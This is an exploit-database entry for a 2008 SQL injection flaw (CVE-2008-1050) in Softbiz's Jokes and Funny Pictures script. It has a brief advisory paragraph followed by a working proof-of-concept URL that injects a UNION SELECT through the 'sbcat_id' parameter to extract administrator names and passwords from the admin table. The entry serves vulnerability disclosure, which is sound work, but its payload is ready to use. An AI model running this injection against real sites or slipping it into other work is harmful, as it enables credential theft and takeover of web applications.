Softbiz Jokes and Funny Pictures Script - 'sbcat_id' SQL Injection



EKU-ID: 36277 CVE: CVE-2008-1050;OSVDB-42371 OSVDB-ID:
Author: -=Mizo=- Published: 2008-02-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/27973/info

The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/*